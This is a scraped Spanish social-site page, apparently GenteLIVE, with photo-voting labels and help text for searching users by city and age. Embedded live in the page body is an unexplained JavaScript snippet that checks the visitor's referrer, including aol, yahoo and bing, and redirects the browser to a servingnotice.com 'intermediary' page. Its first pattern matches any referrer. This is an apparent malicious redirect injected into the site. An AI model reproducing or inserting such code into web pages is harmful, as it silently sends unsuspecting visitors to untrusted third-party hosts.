Foto cuarto   Foto segundo   1º de la semana   1ª de la semana   Foto segunda   Foto Cuarta
  Foto quinto   Foto tercero Foto tercera   Foto quinta
 
Recuerda: puedes votar hasta el viernes a las 24:00
         
Votaciones de esta semana
       
130.480
  • ChicoLive
  • ChicaLive
var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter1/intermediary.html?it11org"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;

Todos los cursos, masters y oposiones que existen.

Las mejores inocentadas para el 28 de diciembre
 

[email protected]

Utilizar el [email protected] es muy muy sencillo, de todas formas recuerda que no podrás visualizar la totalidad de los registros disponibles por el mero hecho de que hay mucha gente que es más reservada a la hora de dar datos como su ciudad de procedencia o su fecha de nacimiento. Resumiendo, si buscas gente que viva en Madrid (España) de entre 15 y 20 años, no visualizarás aquellas personas que, aún cumpliendo dichos requisitos, no han rellenado esos datos a la hora de su registro.

[email protected]

Ayuda

Recomendamos buscar en el campo ciudad cadenas de caracteres aislados (puedes dejar en blanco las opciones que desees), ya que algunas personas modifican las palabras originales dificultando su búsqueda:

Ejemplo: Si en el campo "Ciudad" buscamos "Alcalá", solo aparecerán las personas que hayan puesto "Alcalá" en el momento de registro. Si por el contrario buscamos "Alcal" encontraremos a todos aquellos con "Alcalá", "Alcala", "Alcalicity", etc.

Ejemplo: Si queremos buscar gente de Alcalá pero también de Madrid pondremos en el campo ciudad, siguiendo el consejo anterior, "Alcal", pero además añadiremos "Madrid", con lo que quedaría "Alcal Madrid" ó "Alcal y Madrid", el resultado sería el mismo..

Ejemplo: Algunas personas cubren el campo "Ciudad" con su provincia (Barcelona), otras con su ciudad (Tarrasa), otras con distintivos (BCN). Por lo cual, si buscamos gente de "Barcelona" no nos aparecerán ni los registros de "BCN" ni los de "Tarrasa". Por lo cual pondríamos "Barcel bcn tarras" en el campo "Ciudad" separados por espacios.

Resulta útil realizar múltiples búsquedas variando el contenido de los campos para obtener mejores resultados.

 
Haz GenteLIVE tu página de inicio Añadir a Favoritos Contacto Ayuda